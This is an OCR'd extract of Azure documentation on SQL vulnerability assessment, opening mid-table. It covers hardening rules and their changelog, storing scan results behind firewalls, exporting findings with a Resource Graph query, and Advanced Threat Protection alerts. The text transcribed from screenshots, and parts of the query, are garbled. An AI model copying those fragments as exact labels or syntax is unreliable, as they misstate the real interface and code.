2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID Rule Title Rule Rule Description Platform 


VA2126 


Severity 
Extensibility- Medium SQL Server provides a wide range of features SQL 
features that and services. Some of the features and services, Server 
may affect provided by default, may not be necessary, and 2016+ 
security enabling them could adversely affect the 
should be security of the system. This rule checks that 
disabled if configurations that allow extraction of data to 
not needed an external data source and the execution of 


scripts with certain remote language extensions 
are disabled. 


Removed rules 


Rule ID Rule Title 


VA1021 


VA1024 


VA1069 


VA1090 


VA1103 


VA1229 


VA1231 


VA1234 


VA1252 


VA1253 


VA1263 


VA1266 


VA1276 


VA1286 


VA2000 


Global temporary stored procedures should be removed 
C2 Audit Mode should be enabled 


Permissions to select from system tables and views should be revoked from non- 
sysadmins 


Ensure all Government Off The Shelf (GOTS) and Custom Stored Procedures are 
encrypted 


Use only CLR with SAFE_ACCESS permission 

Filestream setting in registry and in SQL Server configuration should match 
Filestream should be disabled (SQL) 

Common Criteria setting should be enabled 

List of events being audited and centrally managed via server audit specifications. 


List of DB-scoped events being audited and centrally managed via server audit 
specifications 


List all the active audits in the system 

The 'MUST_CHANGE' option should be set on all SQL logins 

Agent XPs feature should be disabled 

Database permissions shouldn't be granted directly to principals (OBJECT or COLUMN) 


Minimal set of principals should be granted high impact database-scoped permissions 


Rule ID 


VA2001 


VA2002 


VA2010 


VA2021 


VA2022 


VA2030 


VA2031 


VA2032 


VA2034 


VA2040 


VA2041 


VA2042 


VA2050 


VA2051 


VA2052 


VA2100 


VA2101 


VA2102 


VA2104 


Rule Title 


Minimal set of principals should be granted high impact database-scoped permissions 
on objects or columns 


Minimal set of principals should be granted high impact database-scoped permissions 
on various securables 


Minimal set of principals should be granted medium impact database-scoped 
permissions 


Minimal set of principals should be granted database-scoped ALTER permissions on 
objects or columns 


Minimal set of principals should be granted database-scoped ALTER permission on 
various securables 


Minimal set of principals should be granted database-scoped SELECT or EXECUTE 
permissions 


Minimal set of principals should be granted database-scoped SELECT 


Minimal set of principals should be granted database-scoped SELECT or EXECUTE 
permissions on schema 


Minimal set of principals should be granted database-scoped EXECUTE permission on 
XML Schema Collection 


Minimal set of principals should be granted low impact database-scoped permissions 


Minimal set of principals should be granted low impact database-scoped permissions 
on objects or columns 


Minimal set of principals should be granted low impact database-scoped permissions 
on schema 


Minimal set of principals should be granted database-scoped VIEW DEFINITION 
permissions 


Minimal set of principals should be granted database-scoped VIEW DEFINITION 
permissions on objects or columns 


Minimal set of principals should be granted database-scoped VIEW DEFINITION 
permission on various securables 


Minimal set of principals should be granted high impact server-scoped permissions 
Minimal set of principals should be granted medium impact server-scoped permissions 
Minimal set of principals should be granted low impact server-scoped permissions 


Execute permissions on extended stored procedures should be revoked from PUBLIC 


Rule ID 


VA2105 


VA2112 


VA2115 


VA2123 


VA2127 


Rule Title 

Login password should not be easily guessed 

Permissions from PUBLIC for Data Transformation Services (DTS) should be revoked 
Minimal set of principals should be members of medium impact fixed server roles 
‘Remote Access’ feature should be disabled 


‘External Scripts’ feature should be disabled 


Next steps 


e Vulnerability assessment 


e SQL vulnerability assessment rules changelog 


SQL vulnerability assessment rules 
changelog 


Article e 12/29/2022 


This article details the changes made to the SQL vulnerability assessment service rules. 
Rules that are updated, removed, or added will be outlined below. For an updated list of 
SQL vulnerability assessment rules, see SQL vulnerability assessment rules. 


June 2022 


Rule ID Rule Title Change details 
VA2129 Changes to signed modules should be authorized Logic change 
VA1219 Transparent data encryption should be enabled Logic change 
VA1047 Password expiration check should be enabled for all SQL logins Logic change 


January 2022 


Rule ID Rule Title Change 
details 

VA1288 Sensitive data columns should be classified Removed 
rule 

VA1054 Minimal set of principals should be members of fixed high impact Logic change 


database roles 
VA1220 Database communication using TDS should be protected through TLS Logic change 
VA2120 Features that may affect security should be disabled Logic change 


VA2129 Changes to signed modules should be authorized Logic change 


June 2021 


Rule ID Rule Title Change 
details 


VA1220 Database communication using TDS should be protected through TLS Logic change 


Rule ID 


VA2108 


Rule Title 


Minimal set of principals should be members of fixed high impact 
database roles 


December 2020 


Rule ID 


VA1017 


VA1021 


VA1024 


VA1042 


VA1044 


VA1047 


VA1051 


VA1053 


VA1067 


VA1068 


VA1069 


VA1090 


VA1091 


Rule Title 


Execute permissions on xp_cmdshell from all users (except dbo) 
should be revoked 


Global temporary stored procedures should be removed 
C2 Audit Mode should be enabled 


Database ownership chaining should be disabled for all databases 
except for master, msdb, and tempdb 


Remote Admin Connections should be disabled unless specifically 


required 


Password expiration check should be enabled for all SQL logins 


AUTO_CLOSE should be disabled on all databases 


Account with default name 'sa' should be renamed or disabled 


Database Mail XPs should be disabled when it is not in use 


Server permissions shouldn't be granted directly to principals 


Permissions to select from system tables and views should be 
revoked from non-sysadmins 


Ensure all Government Off The Shelf (GOTS) and Custom Stored 
Procedures are encrypted 


Auditing of both successful and failed login attempts (default trace) 
should be enabled when ‘Login auditing’ is set up to track logins 


Change 
details 


Logic change 


Change details 


Title and 
description 
change 


Removed rule 
Removed rule 


Description 
change 


Title and 
description 
change 


Title and 
description 
change 


Description 
change 


Description 
change 


Title and 
description 
change 


Logic change 


Removed rule 


Removed rule 


Description 
change 


Rule ID 


VA1098 


VA1103 


VA1219 


VA1229 


VA1230 


VA1231 


VA1234 


VA1235 


VA1252 


VA1253 


VA1263 


VA1264 


VA1266 


VA1276 


VA1281 


VA1282 


VA1286 


VA1288 


VA2030 


Rule Title 


Any Existing SSB or Mirroring endpoint should require AES 
connection 


Use only CLR with SAFE_ACCESS permission 

Transparent data encryption should be enabled 

Filestream setting in registry and in SQL Server configuration 
should match 


Filestream should be disabled 


Filestream should be disabled (SQL) 
Common Criteria setting should be enabled 


Replication XPs should be disabled 


List of events being audited and centrally managed via server audit 


specifications. 


List of DB-scoped events being audited and centrally managed via 


server audit specifications. 
List all the active audits in the system 


Auditing of both successful and failed login attempts should be 
enabled 


The 'MUST_CHANGE' option should be set on all SQL logins 
Agent XPs feature should be disabled 

All memberships for user-defined roles should be intended 
Orphan roles should be removed 


Database permissions shouldn't be granted directly to principals 
(OBJECT or COLUMN) 


Sensitive data columns should be classified 


Minimal set of principals should be granted database-scoped 
SELECT or EXECUTE permissions 


Change details 


Logic change 


Removed rule 


Description 
change 


Removed rule 


Description 
change 


Removed rule 
Removed rule 
Title, description, 
and Logic 


change 


Removed rule 


Removed rule 


Removed rule 


Description 
change 


Removed rule 
Removed rule 
Logic change 
Logic change 


Removed rule 


Description 
change 


Removed rule 


Rule ID 


VA2033 


VA2062 


VA2063 


VA2100 


VA2101 


VA2102 


VA2103 


VA2104 


VA2105 


VA2108 


VA2111 


VA2112 


VA2113 


VA2114 


VA2115 


VA2120 


VA2121 


VA2123 


Rule Title 


Minimal set of principals should be granted database-scoped 
EXECUTE permission on objects or columns 


Database-level firewall rules should not grant excessive access 


Server-level firewall rules should not grant excessive access 


Minimal set of principals should be granted high impact server- 
scoped permissions 


Minimal set of principals should be granted medium impact server- 
scoped permissions 


Minimal set of principals should be granted low impact server- 
scoped permissions 


Unnecessary execute permissions on extended stored procedures 
should be revoked 


Execute permissions on extended stored procedures should be 
revoked from PUBLIC 


Login password should not be easily guessed 


Minimal set of principals should be members of fixed high impact 
database roles 


Sample databases should be removed 


Permissions from PUBLIC for Data Transformation Services (DTS) 
should be revoked 


Data Transformation Services (DTS) permissions should only be 
granted to SSIS roles 


Minimal set of principals should be members of high impact fixed 
server roles 


Minimal set of principals should be members of medium impact 
fixed server roles 


Features that may affect security should be disabled 


‘OLE Automation Procedures’ feature should be disabled 


‘Remote Access’ feature should be disabled 


Change details 


Description 
change 


Description 
change 


Description 
change 


Removed rule 


Removed rule 


Removed rule 


Logic change 


Removed rule 


Removed rule 


Logic change 


Logic change 


Removed rule 


Description and 
logic change 


Logic change 


Removed rule 


Logic change 


Title and 
description 
change 


Removed rule 


Rule ID 


VA2126 


VA2127 


VA2129 


VA2130 


Rule Title 


Features that may affect security should be disabled 


‘External Scripts’ feature should be disabled 
Changes to signed modules should be authorized 


Track all users with access to the database 


Next steps 


e SQL vulnerability assessment rules 


e SQL vulnerability assessment overview 


Change details 


Title, description, 
and logic change 


Removed rule 
Platform update 


Description and 
logic change 


e Store vulnerability assessment scan results in a storage account accessible behind 


firewalls and VNets 


Store Vulnerability Assessment scan 
results in a storage account accessible 
behind firewalls and VNets 


Article e 10/11/2023 


Applies to: D Azure SQL Database D Azure SQL Managed Instance D Azure 
Synapse Analytics 


If you're limiting access to your storage account in Azure for certain VNets or services, 
you'll need to enable the appropriate configuration so that Vulnerability Assessment 
(VA) scanning for SQL Databases or Azure SQL Managed Instances have access to that 
storage account. 


O Note 


These settings are not required when using Express Configuration. 


Prerequisites 


The SQL Vulnerability Assessment service needs permission to the storage account to 


save baseline and scan results. 
Use SQL Server managed identity: 


e The SQL Server must have a managed identity. 

e The storage account must have a role assignment for the SQL Managed Identity as 
Storage Blob Data Contributor. 

e When you apply the settings, the VA fields storageContainerSasKey and 
storageAccountAccessKey must be empty (configuration using storage account 
key or storage SAS key is not valid for this scenario). 


When you use the Azure portal to save SQL VA settings, Azure checks if you have 
permission to assign a new role assignment for the managed identity as Storage Blob 
Data Contributor on the storage. If permissions are assigned, Azure uses SQL Server 
managed identity, otherwise Azure uses the key method (which is not supported for this 


scenario). 


© Note 


1. User assigned managed identities are not supported for this scenario. 
2. If using Azure Storage lifecycle management policies, avoid moving files on 
the container used by VA to the archive access tier. Reading scan results or 


baseline configurations stored in archive access tier isn't supported. 


Enable Azure SQL Database VA scanning access 
to the storage account 


If you've configured your VA storage account to only be accessible by certain networks 
or services, you'll need to ensure that VA scans for your Azure SQL Database are able to 
store the scans on the storage account. You can use the existing storage account, or 
create a new storage account to store VA scan results for all databases on your logical 
SQL server. 


© Note 
The vulnerability assessment service can't access storage accounts protected with 
firewalls or VNets if they require storage access keys. 

Go to your Resource group that contains the storage account and access the Storage 


account pane. Under Settings, select Firewall and virtual networks. 


Ensure that Allow trusted Microsoft services access to this storage account is checked. 


Allow access from 


4 


Configure network security for your storage accounts. Learn more. 


Virtual networks 


Secure your storage account with virtual networks. + Add existing virtual network + Add new virtual network 


Virtual Network Subnet Address range 


No network selected. 


Firewall 


Add IP ranges to allow access from the internet or your on-premises networks. Learn more. 


JA Add your client IP address (' ) © 


Address range 


| IP address or CIDR 


Exceptions 
E Allow trusted Microsoft services to access this storage account @ 
access to storage logging from any networ 


TI Allow read access to storage metrics from any network 


To find out which storage account is being used, do the following steps: 


1. Go to your SQL server pane in the Azure portal”. 
2. Under Security, select Defender for Cloud. 
3. Select Configure. 


Home > sqlserveriascdemo | Microsoft Defender for Cloud 


Server settings 


sqlserverlascdemo 


Save X Discard Áp Feedback 


MICROSOFT DEFENDER FOR SQL 
D o 


(i) Microsoft Defender for SQL costs 15 USD/server/month. It includes Vulnerability 
Assessment and Advanced Threat Protection. We invite you to a trial period for the first 
30 days, without charge. 


VULNERABILITY ASSESSMENT SETTINGS 


OO Switch to the new express configuration experience for SQL Vulnerability Assessment 
(preview). Express configuration will be saved as the default for when you turn off 
Defender for SQL on this server and then turn it back on. Learn more 


Subscription 
ASC DEMO 
Select Subscription 


Storage account 
ascdemostr 
Select Storage account 


Periodic recurring scans 


Con TZE 
Scans will be triggered automatically once a week. In most cases, it will be on the day 


Vulnerability Assessment has been enabled and saved. A scan result summary will be sent to 
the email addresses you provide. 


Send scan reports to © 


| Email addresses ZA 


@ Also send email notification to admins and subscription owners © 


Store VA scan results for Azure SQL Managed 
Instance in a storage account that can be 
accessed behind a firewall or VNet 


Since Azure SQL Managed Instance isn't a trusted Microsoft Service and has a different 
VNet from the storage account, executing a VA scan will result in an error. 


O Note 


It is highly recommended to make sure your Azure SQL Managed Instances are 
enrolled to the November 2022 feature wave which will allow much simpler 
configuration of SQL Vulenrability Assessment when the storage account is behind 
a firewall or VNET. 


To support VA scans on Azure SQL Managed Instances that have the November 2022 
feature wave installed, follow the below steps: 


1. Under the Azure SQL Managed Instance's Overview page, note the value under 
Virtual network / subnet. 


2. Head to the Networking page in the storage account where SQL VA is configured 
to store the scan results. 


3. Under the Firewalls and virtual networks tab, under Public network access select 
Enabled from selected virtual networks and IP addresses. 


4. Under the Virtual networks section, click Add existing virtual network and 


selected the VNET and subnet used by the managed instance that you've noted in 
the first step. 


Home > myvastorage Add networks 
g myvastorage | Networking + 


Subnet = Addressrange perean berr Group 
MyMI-RG 
MyMI-RG 


To support VA scans on Azure SQL Managed Instances that do not have the November 
2022 feature wave installed, follow the below steps: 


1. In the SQL managed instance pane, under the Overview heading, click the Virtual 
network/subnet link. This takes you to the Virtual network pane. 


+ Newdatabase g Reset password E Delete © Feedback 
A Essentials 

Resource group : myResourceGroup 

Status : Online 

Location : East US 

Subscription 


Subscription ID : 


Managed instance admin : AzureAdmin 


Host : salmi-docs.824068dba601.database.windows.net 
Pricing tier : General Purpose Gen5 (160 GB, 4 vCores) 

Instance pool : Not in an instance pool 

Virtual cluster : VirtualCluster6aaff98b-5ac3-444f-8b7c-323ca8eaf585 


2. Under Settings, select Subnets. Click + Subnet in the new pane to add a subnet. 


For more information, see Manage subnets. 


Home > SQL managed instances > MyMI > MyMI-VNET 


<5 Mymevnet | Subnets + 


Virtual network 


[2 Search ++ Subnet -+ Gateway subnet Č) Refresh 


a 


PQ Manage users D Delete 


«> Overview 
[2 Search subnets 


Activity log 

Pa Access control (IAM) Name Ty IPv4 TA 
@ Tags Managedinstance 10.0.0.0/24 
@ Diagnose and solve problems VulnerabilityAssessment 10.0.1.0/24 


Available IPs Ty. Delegated to Ty Security group TL Route table TY A 


Microsoft Sql/managedinsta.. MyMI-RG MyMI-RT 


3. The new subnet should have the following configurations: 
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None 
Network security group 
Route table 
SERVICE ENDPOINTS 


0 selected 


SUBNET DELEGATION 

Delegate subnet to a service © 

NETWORK POLICY FOR PRIVATE ENDPOINTS 

The network policy affects all private endpoints in this subnet. Select the types of network policies that 
control traffic going to the private endpoints in this subnet. Learn more 

Private endpoint network policy 


e NAT gateway: None 
e Network security group: None 


e Route table: None 

e SERVICE ENDPOINTS - services: None selected 

e SUBNET DELEGATION - Delegate subnet to a service: None 

e NETWORK POLICY FOR PRIVATE ENDPOINTS - Private endpoint network 
policy: None selected 


4. Head to the storage account where SQL VA is configured to store the scan results 
and click the Private endpoint connections tab, then click + Private endpoint 


Home > myvastorage 


&®& myvastorage | Networking 


Storage account 


OS h n i 
D earc Firewalls and virtual networks Private endpoint connections Custom 
= Overview pa 
Refresh 
ba Activity log O po 
@ Tags Public network access 


O Enabled from all networks 


Di d sol bi 
d eukon (O) Enabled from selected virtual networks and IP addresses 


Pa Access Control (IAM) O Disabled 
@ Data migration @ Configure network security for your storage accounts. Learn more C 
F Events Vi | A 


St browse 
B Storage browser -+ Add existing virtual network zk Add new virtual network 


Data storage Virtual Network Subnet 
= Containers No network selected. 
4@ File shares 


Home > myvastorage 


2 myvastorage | Networking x 


Storage account 
« O O O DO O . 
Firewalls and virtual networks Private endpoint connections} Custom domain 
A EEE 
-H Private endpoint “ Approve X Reject [ii] Remove O Refresh 


| P Search 


= Overview 


E Activity log 

@ Tags | Filter by name... | | All connection states v | 

@ Diagnose and solve problems I Connection name Connection state Private endpoint 
Ra Access Control (IAM) No results 


E Data migration 


5. Choose the details for your private endpoint (it's suggested to put it in the same 


RG and the same region). 


Home > myvastorage | Networking > 


Create a private endpoint 


@ Basics Resource Virtual Network DNS Tag Review + create 


Use private endpoints to privately connect to a service or resource. Your private endpoint must be in the same region as your 
virtual network, but can be in a different region from the private link resource that you are connecting to. Learn more 


Project details 

Subscription * © | MySubscription Vv | 
Resource group * © | MyMI-RG bai | 

Create new 

Instance details 

EO 

Network Interface Name * | vva-pe -nic v | 

Region * | (US) East US Vv | 


6. Choose blob for the Target sub-resource 


Home > myvastorage | Networking > 


Create a private endpoint 


V Basics D Resource Virtual Network DNS Tags Review + create 


Private Link offers options to create private endpoints for different Azure resources, like your private link service, a SQL server, or 
an Azure storage account. Select which resource you would like to connect to using this private endpoint. Learn more 


Subscription MySubscription (11111111-2222-3333-4444-555555555555) 

Resource type Microsoft.Storage/storageAccounts 

Resource myvastorage 

Target sub-resource * © Vv 


7. Select the virtual network of the SQL MI (from step 1) and choose the subnet you 
created (step 3): 


Home > myvastorage | Networking > 


Create a private endpoint 


V Basics “Resource D Virtual Network DNS ags Review + create 


Networking 


To deploy the private endpoint, select a virtual network subnet. Learn more 


Ee eerren = 


Subnet* © | VulnerabilityAssessment bai | 


Network policy for private endpoints Disabled (edit) 


Private IP configuration 
© Dynamically allocate IP address 
O Statically allocate IP address 


Application security group 


Configure network security as a natural extension of an application's structure. ASG allows you to group virtual machines and 
define network security policies based on those groups. You can specify an application security group as the source or 
destination in an NSG security rule Learn more 


+ Create 


Application security group 


| x] 


8. Select Integrate with private DNS zone (should be default) and choose the other 


default values 


Home > myvastorage |Networking 


Create a private endpoint 


V Basics v Resource v Virtual Network @ DNS 


Private DNS integration 


To connect privately with your private endpoint, you need a DNS record. We recommend that you integrate your private 
endpoint with a private DNS zone. You can also utilize your own DNS servers or create DNS records using the host files on your 
virtual machines. Learn more 


Integrate with private DNS zone © Yes O No 
Configuration name Subscription Resource group Private DNS zone 
privatelink-blob-core-win...MySubscription v | | MyMI-RG v | privatelink blob.core.wind... 


9. Continue to the Review + Create tab and click Create. Once the deployment is 
done you should see this in the Private endpoint connections tab under the 
Network section of the Storage account: 


Home > myvastorage 


@® myvastorage | Networking * = 


Storage account 


P Search 


Firewalls and virtual networks Private endpoint connections Custom domain 
= Overview e 
Sa + Private endpoint oO Refresh 
a Activity log 
@ Tags Filter by name... All connection states v 
ZO Diagnose and solve problems g Connection name Connection state Private endpoint Description Q 
®g Access Control (IAM) g my vastorage.cd5332 Approved wa-pe Auto-Approved 


E Data migration 


You should now be able to store your VA scans for Azure SQL Managed Instances in 
your storage account. 


Troubleshoot vulnerability assessment scan- 
related issues 


Troubleshoot common issues related to vulnerability assessment scans. 


Failure to save vulnerability assessment settings 


You might not be able to save changes to vulnerability assessment settings if your 
storage account doesn't meet some prerequisites or if you have insufficient permissions. 


Storage account requirements 


The storage account in which vulnerability assessment scan results are saved must meet 
the following requirements: 


e Type: StorageV2 (General Purpose V2) or Storage (General Purpose V1) 

e Performance: Standard (only) 

e Region: The storage must be in the same region as the instance of Azure SQL 
Server. 


If any of these requirements aren't met, saving changes to vulnerability assessment 
settings fails. 


Permissions 


The following permissions are required to save changes to vulnerability assessment 
settings: 


e SQL Security Manager 
e Storage Blob Data Reader 


e Owner role on the storage account 


Setting a new role assignment requires owner or user administrator access to the 
storage account and the following permissions: 


e Storage Blob Data Owner 


Storage account isn't visible for selection in vulnerability 
assessment settings 


The storage account might not appear in the storage account picker for several reasons: 


e The storage account you're looking for isn't in the selected subscription. 

e The storage account you're looking for isn't in the same region as the instance of 
Azure SQL Server. 

e You don't have Microsoft.Storage/storageAccounts/read permissions on the 
storage account. 


Failure to open an email link for scan results or can't view 
scan results 


You might not be able to open a link in a notification email about scan results, or to view 
scan results if you don't have the required permissions, or if you use a browser that 
doesn't support opening or displaying scan results. 


Required permissions 


The following permissions are required to open links in email notifications about scan 


results or to view scan results: 


e SQL Security Manager 
e Storage Blob Data Reader 


Browser requirements 


The Firefox browser doesn't support opening or displaying scan results view. We 
recommend that you use Microsoft Edge or Chrome to view vulnerability assessment 


scan results. 


Next steps 


e Vulnerability Assessment 
e Create an Azure Storage account 
e Microsoft Defender for SQL 


How to consume and export scan 
results 


Article e 06/05/2023 


Defender for SQL's Vulnerability Assessment (VA) ability scans your databases on a 
weekly basis and produces reports on any misconfigurations that are identified. 


All findings are stored in Azure Resource Graph (ARG) which is also the source for most 
of the Defender for SQL UI experience. When findings are written to ARG, they're also 
enriched with other Microsoft Defender for Cloud settings such as disabled rules or 
exempt recommendations so that consuming the data from ARG represents the 
effective status of all findings and recommendations. 


This article describes several ways to consume and export your scan results. 


Query and export findings in ARG with 
Defender for Cloud 


To query and export your findings with ARG with Defender for Cloud: 
1. Sign in to the Azure portal £. 
2. Navigate to Microsoft Defender for Cloud > Recommendations. 
3. Search for and select either: 


e For Azure SQL databases - SQL databases should have vulnerability 


findings resolved. 


e For SQL on machines - SQL servers on machines should have vulnerability 


findings resolved. 
4. Select Open Query. 
5. Select either 


e Query returning affected resources - Returns a list of the resources that are 
currently affected (recommendation status per resource). 

e Query returning security findings - Returns a list of all security findings 
(findings and subassessments aggregated per applicable resources). 


6. Select Run query. 


7. Select Download a CSV, to export your results to a CSV file. 


These queries are editable and can be customized to a specific resource, set of findings, 
findings status or more. 


Query and export findings in ARG 
To query and export your findings with ARG: 

1. Sign in to the Azure portal £. 

2. Navigate to Resource Graph Explorer. 


3. Edit and enter the following query: 


Bash 


securityresources 

| where type =~ "microsoft.security/assessments/subassessments" 

| extend assessmentKey=extract(@"(? 
i)providers/Microsoft.Security/assessments/([*/]*)", 1, id), 
subAssessmentId=tostring(properties.id), parentResourcelId= extract(" 
(.+)/providers/Microsoft.Security", 1, id) 

| extend resourceIdTemp = iff(properties.resourceDetails.id != 
properties.resourceDetails.id, extract(" 
(.+)/providers/Microsoft.Security", 1, id)) 

| extend resourceld = iff(properties.resourceDetails.source =~ 
"OnPremiseSql", strcat(resourcelIdTemp, "/servers/", 
properties.resourceDetails.serverName, "/databases/" , 
properties.resourceDetails.databaseName), resourceldTemp) 

| where resourcelId =~ 
"/subscriptions/resourcegroups/rgname/providers/microsoft.sql/servers/s 
ervername/databases/dbname" 

| where assessmentKey =~ "82e20e14-edc5-4373-bfc4-£13121257¢37" 

| project resourceld, 

assessmentKey, 

subAssessmentId, 

name=properties.displayName, 

description=properties.description, 
severity=properties.status.severity, 

status=properties.status.code, 

cause=properties.status.cause, 

category=properties.category, 

impact=properties.impact, 

remediation=properties.remediation, 
benchmarks=properties.additionalData. benchmarks 


4. Select Run query. 


5. Select Download a CSV, to export your results to a CSV file. 


Home > demodb (demosrv/demodb) | Microsoft Defender for Cloud > demodb (demosrv/demodb) 
Azure Resource Graph Explorer + x 
{| + newquey CS openaquery & Set authorization scope ave - seveas |? Feedback 
Scope Directory : Microsoft 
Query 
Gri Ge E securityresources é 
2 2 | where type =~ "microsoft. security/assessments/subassessnents” 
— 3 | extend assessmentKey=extract (@"(?i)providers/Microsoft .Security/assessments/([*/]*)", 1, id), subAssessmentId=tostring(properties.id), parentResourceTd= extract("(.+)/providers/ 
A Seach Microsoft.Security", 1, id) 
4 | extend resourceldTemp = iff(properties.resourceDetails.id properties. resourceDetails.id, extract("(.+)/providers/Microsoft.Security", 1, id)) 
> General 5 | extend resourceld = iff(properties.resourceDetails.source =~ “OnPremiseSql”, strcat(resourceldTemp, “/servers/", properties.resourceDetails.serverNane, "/databases/" , properties. 
> Al + machine learning resourcedetails.databaseliane), resourceldTenp) 
Seda 6 | where resourceld =~ “/subscriptions/<nysubscriptionid> /resourceGroups /demo-rg/providers/Microsoft .Sql/servers/denosrv/databases/denodb" 
> 7 | where assessmentKey =~ "82e20e14-edc5-4373-bfc4-f13121257c37" 
Compute. a | project resourcerd, 
> Containers 9 assessnentKey, 
> Databases 10 subAssessmentId, 
Sies u name=propertiesdisplayName, 
12 descr iption=properties description, 
> Hybrid gudea 
> Identity Get started Results Charts Messages. 
> Integration 
> Intemet of Things d Pin to dashboard Formatted results rz Off 
> Management and governance 
resourceld Ty, assessmentKey ty  subAssessmentld y name description severity status cause category impact remediation Benchmarks 
> Migration 
> Mixed reality /subscriptions/... B2e20e14-edc5-437.. VA1020 Database user GUEST... The guest user permit... High Healthy Unknown ‘AuthenticationAndAut... Database Roles are th.. Remove GE CNA 
> Monitor /subscriptions/... 82e20e14-edc5-437.. VA1054 Excessive permissions... Every SQL Server login... Low Healthy Unknown ‘AuthenticationAndAut... Database Roles are th... Revoke arren PHAN benchm. 
> Networking 
Sa [subscriptions/.. 82e20e14-edc5-437.. VA1095 Excessive permissions ... Every SQL Server login.. Medium Healthy Unknown AuthenticationAndAut... Database Roles are th... Revoke any EEE [PBenchm 
eg 
Ste /subscrptions/.. 82e20e14-edc5-437.. VA1096 Principal GUEST shoul.. Each database include... Low Healthy Unknown AuthenticationAndAut... The special user GUES.. Revoke any unnecessa. Pero 
> Web /subscriptions/... 82¢20e14-edc5-437..._ VA1097 Principal GUEST shoul.. Each database include... Low Healthy Unknown ‘AuthenticationAndAut... The special user GUES... Revoke any unnecessa..._[{"benchm, 
This query Is editable and can be customized to a specific resource, set of findings, 
2. Navigate to Y SQL datab > Microsoft Defender for Cloud 
Home > demodb (demosrv/demodb) | Microsoft Defender for Cloud > 


o SQL Vulnerability Assessment rules have been updated. This may impact your scan results. Learn more —> 


EU Scan History C) Refresh E Feedback 


Resource Total vulnerabilities Vulnerabilities by severity Last scan time 


LEARN MORE 
SQL Vulnerability Assessment SZ 


a demodb 1 High ai 5/31/2023, 4:06:01 AM UTC 
Medium 0 Host resource 
Low 1 demosrv/demodb 
Findings Passed Not applicable 
| Benchmarks: Al EGO l 
P Search to filter items.. | 
ID Security check Category Benchmark Severity Additional Info 
VA2109 Minimal set of principals should be members of fixed low impact database r... Authentication And Authorization FedRAMP @ Low 


4. Select Run query. 


5. Select Download a CSV, to export your results to a CSV file. 


Home > demodb (demosry; //demodb) | Microsoft Defender for Cloud > demodb (demosrv/ /demodb) 


Azure Resource Graph Explorer + x 


m 
X 


fi MO 
AA ARANO 


eTdTer 


jers/Microsoft .Sql/servers/denostv/databases/demodb” 


status 


Principal GUEST shoul... Each d 


Principal GUEST shoul.. Each database include... Low 


This query is editable and can be customized to a specific resource, set of findings, 
findings status or more. 


Automate email notifications with LogicApps 


Azure Logic Apps is a low-code or no-code cloud-based service that provides you with a 
way to automate workflows and integrate data and services across different systems, 
both in the cloud and on-premises. You can use Logic App to automate the reports of 
your vulnerability assessment findings across all supported versions of SQL, to send a 
weekly vulnerability report summary for any servers that were scanned. You can 
customize Logic App to run on different schedules such as daily, weekly, monthly or 
more. You can also customize Logic App to report on different scopes such as per 
database, server, resource group or more. 


You can use these instructions “, to learn how to use Logic Apps to automate email 


notifications using an example template. 


This example Logic App template automates a weekly email report that summarizes the 
vulnerability scan results for every database from a selected list of servers. After you 
deploy the template, you must authorize the Office 365 connector to generate a valid 
access token to authenticate your credentials. 


The recipients will then receive emails with the findings of the scan results. 


Sample email Azure SQL server: 


A Vulnerability Assessment report is available 
for your server 


3 Scan results 
Deien canad Total saro checks Total passing checks Eze ture mary 
High sisa 
46 de 77 9 KO 
Meters ro 
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Law siik 
e E 
Database Sean mr Failing checks Passing checks Details 
master Findings 30 69 View results > 
Demot Fiedings 10 ae View results > 
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Subscription 1D 
Subscription name Subscription 
Resource demo 
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Sample email SQL VM: 


A Vulnerability Assessment report is available 
for your machine 'sqlvm' 


=] Scan results 


Databases tanned Total tabag checks Tota! paming checks Risk curtetary 
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4 
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test? Findings 20 29 View results > 
IMSSCA SERVED 
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Resource sqivm 
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notifications on vulnerability asezer szam. The emails ave automated via an Asare Logi App. 


JE Corporat 
BE Mxrosoft 


Other options 


You can use workflow automations to trigger actions based on changes to the 


recommendation's status. 


You can also use the Vulnerability Assessments workbook to view an interactive report 
of your findings. The data from the workbook can be exported, and a copy of the 
workbook can be customized and stored. Learn how to create rich, interactive reports of 


Defender for Cloud data 


You can also enable Continuous export to stream alerts and recommendations as they're 
generated or to define a schedule to send periodic snapshots of all of the new data. 


Next steps 


Enable Microsoft Defender for SQL servers on machines 


SQL Advanced Threat Protection 


Article e 03/03/2023 


Applies to: D Azure SQL Database D Azure SQL Managed Instance D Azure 
Synapse Analytics © SQL Server on Azure VM D Azure Arc-enabled SQL Server 


Advanced Threat Protection for Azure SQL Database, Azure SQL Managed Instance, 
Azure Synapse Analytics, SQL Server on Azure Virtual Machines and Azure Arc-enabled 
SQL Server detects anomalous activities indicating unusual and potentially harmful 
attempts to access or exploit databases. 


Advanced Threat Protection is part of the Microsoft Defender for SQL offering, which is 
a unified package for advanced SQL security capabilities. Advanced Threat Protection 
can be accessed and managed via the central Microsoft Defender for SQL portal. 


Overview 


Advanced Threat Protection provides a new layer of security, which enables customers 
to detect and respond to potential threats as they occur by providing security alerts on 
anomalous activities. Users receive an alert upon suspicious database activities, potential 
vulnerabilities, and SQL injection attacks, as well as anomalous database access and 
queries patterns. Advanced Threat Protection integrates alerts with Microsoft Defender 
for Cloud Z , which include details of suspicious activity and recommend action on how 
to investigate and mitigate the threat. Advanced Threat Protection makes it simple to 
address potential threats to the database without the need to be a security expert or 
manage advanced security monitoring systems. 


For a full investigation experience, it is recommended to enable auditing, which writes 
database events to an audit log in your Azure storage account. To enable auditing, see 
Auditing for Azure SQL Database and Azure Synapse or Auditing for Azure SQL 
Managed Instance. 


Alerts 


Advanced Threat Protection detects anomalous activities indicating unusual and 
potentially harmful attempts to access or exploit databases. For a list of alerts, see the 
Alerts for SQL Database and Azure Synapse Analytics in Microsoft Defender for Cloud. 


Explore detection of a suspicious event 


You receive an email notification upon detection of anomalous database activities. The 
email provides information on the suspicious security event including the nature of the 
anomalous activities, database name, server name, application name, and the event 


time. In addition, the email provides information on possible causes and recommended 


actions to investigate and mitigate the potential threat to the database. 


ek 


EE Microsoft 


Azure SQL database 


Potential exploitation of application code 
vulnerability to SQL Injection was detected. This 


may indicate a SQL Injection attack on database 


‘samplecrmwedema'. 


AN Activity details 


Severity High 

Subscription ID 

Subscription Name DS-THREATDETECTION_DEMO_TOMERR_R&D_60843 
Server 

Database 

IP address 

Principal Name de***** 

Application Net SqlClient Data Provider 

Date May 13, 2018 12:09:12 UTC 

Threat ID 1 


Potential causes 


Investigation steps 


Remediation steps 


